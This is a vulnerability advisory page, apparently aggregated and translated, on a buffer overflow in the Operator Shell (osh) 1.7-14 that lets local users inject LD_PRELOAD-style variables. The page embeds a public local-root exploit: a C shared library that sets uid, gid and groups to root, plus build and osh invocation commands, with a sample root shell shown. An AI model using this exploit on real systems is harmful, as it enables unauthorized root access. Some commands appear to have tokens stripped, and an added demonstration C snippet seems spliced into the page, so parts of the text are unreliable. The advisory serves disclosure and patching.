Published: 2005-11-20 16:03:00
Revised: 2011-03-07 21:26:23

[Original] Buffer overflow in the environment variable substitution code in main.c in OSH 1.7-14 allows local users to inject arbitrary environment variables, such as LD_PRELOAD, via pathname arguments of the form "$VAR/EVAR=arg", which cause the EVAR portion to be appended to a buffer returned by a getenv function call.

[CNNVD] Mike Neuman OSH Environment Variable Buffer Overflow Vulnerability (CNNVD-200511-276)

A buffer overflow in the environment variable substitution code in main.c of OSH 1.7-14 allows local users to inject arbitrary environment variables, such as LD_PRELOAD, via pathname arguments of the form "$VAR/EVAR=arg" (which cause the EVAR portion to be appended to the buffer returned by a getenv function call).

- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may result in a complete system outage]
Access complexity: LOW [no access restrictions on exploitation]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication required for exploitation]

- CPE (affected platforms and products)


- OVAL (technical details for detection)


- Official database links
(official data source) MITRE
(official data source) NVD
(official data source) CNNVD

- Other links and resources
(UNKNOWN)  VUPEN  ADV-2005-2378
(UNKNOWN)  XF  osh-main-execute-code(23091)
(UNKNOWN)  BID  15370

- Vulnerability information

Mike Neuman OSH Environment Variable Buffer Overflow Vulnerability
High severity  Buffer overflow
2005-11-20 00:00:00 2005-11-21 00:00:00
A buffer overflow in the environment variable substitution code in main.c of OSH 1.7-14 allows local users to inject arbitrary environment variables, such as LD_PRELOAD, via pathname arguments of the form "$VAR/EVAR=arg" (which cause the EVAR portion to be appended to the buffer returned by a getenv function call).

- Advisories and patches


- Vulnerability information (1300)

Operator Shell (osh) 1.7-14 Local Root Exploit (EDBID:1300)
linux local
2005-11-09 Verified
0 Charles Stevenson
N/A
# OSH 1.7-14 Exploit
# EDUCATIONAL purposes only.... :-)
# by Charles Stevenson (core) <>
# Description:
# The Operator Shell (Osh) is a setuid root, security enhanced, restricted
# shell. It allows the administrator to carefully limit the access of special
# commands and files to the users whose duties require their use, while
# at the same time automatically maintaining audit records. The configuration
# file for Osh contains an administrator defined access profile for each
# authorized user or group.
# Problem discovered and described by Solar Eclipse:
#  main.c:439
#      if (gettoken(env, MAXENV)!=TWORD) {
#        fprintf(stderr,"Illegal or too long environment variable\n");
#        break;
#      }
#      if ((env2=getenv(env))==NULL) {
#        char temp[255];
#        char *temp2;
#        strcpy(temp,env);
#        if ((temp2=(char *)strrchr(temp,'/'))!=NULL) {
#          if (temp2!=temp)
#            *temp2='\0';
#          else
#            *(temp2+1)='\0';
#          if ((env2=getenv(temp))!=NULL) {
#            strcat(env2,"/");
#            strcat(env2,temp2+1);
#          }
#        }
#      }
#  exploit:
#      This code is used to handle substitutions of environmental
#      variables. If the first call to getenv() fails, we might have a case
#      like $VAR/filename, so we find the last '/' character and replace
#      it with '\0'. Then we call getenv() on the shortened variable and
#      append "/filename" to it. The problem is that the return value of
#      getenv() is a NULL terminated string on the stack and by appending
#      to it we will be overwriting the data after the string.
#      This bug allows us to overwrite one of the environmental variables
#      passed to the child process. If we set the environmental variable
#      $VAR to the string "a" before executing osh, and then pass
#      "$VAR/" as a command line parameter, the above
#      code will overwrite the value of some environmental variable located
#      after $VAR with Then osh will execute an
#      external non-suid program and the code in will be executed.
#      I have not tested this, but it looks like a really cool bug.
# Risk: Medium since user would have to be in the operator group which
#       the admin would have to grant explicitly and I assume would be
#       a trustworthy individual ;-)
#       Then again the last two have been classified as "urgency=high"
#       according to Debian policy.  Truly sorry to cause Oohara Yuuma
#       so much work.  You really should orphan this package ;)
# Solution:
# apt-get --purge remove osh
# greetz to solar eclipse, nemo, andrewg, arcanum, mercy, amnesia, 
# banned-it, capsyl, sloth, ben, KF, akt0r, MRX, salvia, thn
# (#social)
# 0dd: much <3 & respect
# Obligatory screenshot:
#   core@charity:~/hacking/sploits$ dpkg -l osh|grep ^ii
#   ii  osh            1.7-14         Operator's Shell
#   core@charity:~/hacking/sploits$ ./ 
#   telnet: could not resolve /home/core/ Name or service not known
#   sh-3.00# id
#   uid=0(root) gid=0(root) groups=0(root)

cd /tmp; cat >ownall.c <<EOF
/* ownall.c by Charles Stevenson (core) <>
 * greetz Solar Eclipse, 0dd, (#social) */
#include <stdlib.h>
#include <unistd.h>
int close(int fd) {
  gid_t groupsex = 0; /* osh isn't gettin' any tonight */
  setuid(0); /* Not really needed but make uid root */
  setgid(0); /* Set gid root too! */
  setgroups((size_t)1,&groupsex); /* This makes my pastes cooler looking */
  clearenv(); /* LD_PRELOAD was causing headaches ;) */
  return 0;
}
EOF
gcc -shared -o ownall.c
osh telnet -l '$USER/LD_LIBRARY_PATH=.' '$HOME/'
rm -f ownall*

# [2005-11-09]
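The mechanism described in the exploit header above, as an added example that is not osh code or the exploit author's: a getenv()-style lookup over a constructed environment block, the in-place strcat() fallback mirrored from main.c beside a bounded rewrite, showing why the neighbouring variable is lost and how the fix avoids writing through the pointer getenv() returns. The function names and the sample block are assumptions made for this example.

```c
#include <stdio.h>
#include <string.h>
/* getenv()-style lookup over "NAME=value\0...\0\0"; returns a pointer INTO the block. */
static char *block_getenv(char *block, const char *name) {
    size_t n = strlen(name);
    for (char *p = block; *p != '\0'; p += strlen(p) + 1)
        if (strncmp(p, name, n) == 0 && p[n] == '=')
            return p + n + 1;
    return NULL;
}

/* Mirrors the osh 1.7-14 fallback: "$VAR/rest" -> getenv("VAR") + "/" + rest,
 * appended in place through getenv()'s pointer, past the value's NUL. */
static char *substitute_unsafe(char *block, const char *var) {
    char temp[255], *slash, *val;
    if (strlen(var) >= sizeof temp) return NULL;
    strcpy(temp, var);
    if ((slash = strrchr(temp, '/')) == NULL) return block_getenv(block, temp);
    *slash = '\0';
    if ((val = block_getenv(block, temp)) == NULL) return NULL;
    strcat(val, "/");                 /* overflow: clobbers the next entry */
    strcat(val, slash + 1);
    return val;
}

/* Hardened form: caller-owned output buffer, fail closed if the result does not fit. */
static int substitute_safe(char *block, const char *var, char *out, size_t outsz) {
    char temp[255], *slash, *val;
    if (strlen(var) >= sizeof temp) return -1;
    strcpy(temp, var);
    if ((slash = strrchr(temp, '/')) != NULL) *slash = '\0';
    if ((val = block_getenv(block, temp)) == NULL) return -1;
    int n = slash ? snprintf(out, outsz, "%s/%s", val, slash + 1)
                  : snprintf(out, outsz, "%s", val);
    return (n < 0 || (size_t)n >= outsz) ? -1 : 0;
}

/* Runs both on a fresh copy of a constructed two-variable block. Returns 2 if
 * the safe form yields "a/EVAR=arg" with AUDIT intact, +1 if the unsafe form
 * makes AUDIT vanish from the block. Expected result: 3. */
int demo(void) {
    static const char init[] = "VAR=a\0AUDIT=on\0";   /* constructed sample */
    char blk[sizeof init], out[32]; int result = 0;
    memcpy(blk, init, sizeof init);
    if (substitute_safe(blk, "VAR/EVAR=arg", out, sizeof out) == 0 &&
        strcmp(out, "a/EVAR=arg") == 0 && block_getenv(blk, "AUDIT") != NULL)
        result |= 2;
    if (substitute_unsafe(blk, "VAR/EVAR=arg") && block_getenv(blk, "AUDIT") == NULL)
        result |= 1;
    return result;
}
```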

- Vulnerability information

Operator Shell (osh) main.c Environment Variable Substitution Local Privilege Escalation
Local Access Required Other
Loss of Integrity
Exploit Public Vendor Verified

- Vulnerability description

Operator Shell (osh) contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is triggered by an error in the handling of environment variable substitutions, and exploited by loading arbitrary shared libraries. This flaw may lead to a loss of Integrity.

- Timeline

2005-11-09 Unknown
Unknown Unknown

- Solution

Upgrade to version 1.15 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Related references

- Vulnerability author

- Vulnerability information

Mike Neuman OSH Environment Variable Buffer Overflow Vulnerability
Boundary Condition Error 15370
No Yes
2005-11-09 12:00:00 2006-04-26 08:46:00
The discovery of this issue is credited to Solar Eclipse.

- Affected program versions

osh osh 1.7
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
Debian Linux 3.1 sparc
Debian Linux 3.1 s/390
Debian Linux 3.1 ppc
Debian Linux 3.1 mipsel
Debian Linux 3.1 mips
Debian Linux 3.1 m68k
Debian Linux 3.1 ia-64
Debian Linux 3.1 ia-32
Debian Linux 3.1 hppa
Debian Linux 3.1 arm
Debian Linux 3.1 amd64
Debian Linux 3.1 alpha
Debian Linux 3.1
Debian Linux 3.0 sparc
Debian Linux 3.0 s/390
Debian Linux 3.0 ppc
Debian Linux 3.0 mipsel
Debian Linux 3.0 mips
Debian Linux 3.0 m68k
Debian Linux 3.0 ia-64
Debian Linux 3.0 ia-32
Debian Linux 3.0 hppa
Debian Linux 3.0 arm
Debian Linux 3.0 alpha
Debian Linux 3.0

- Vulnerability discussion

The 'osh' utility is susceptible to a buffer-overflow vulnerability when processing environment variables. This issue is due to a flaw in the application that results in overwriting adjacent environment variables with user-supplied contents.

Attackers may exploit this issue to execute arbitrary code with superuser privileges.

- Exploit

An exploit is not required.

The following example exploit by Charles Stevenson (core) <> is available:

- Solution

Debian GNU/Linux has released advisory DSA 918-1, along with fixes to address various issues in osh. Please see the referenced advisory for further information.

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at:

osh osh 1.7

- Related references